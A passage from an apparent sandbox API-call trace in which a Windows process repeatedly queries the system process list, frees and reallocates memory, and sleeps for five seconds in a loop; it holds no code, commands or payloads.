SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.114] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.120] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.127] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.134] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.140] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.153] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.162] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.209] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.216] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.231] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.238] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.245] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.252] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.259] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.267] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.275] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.282] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.289] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.297] 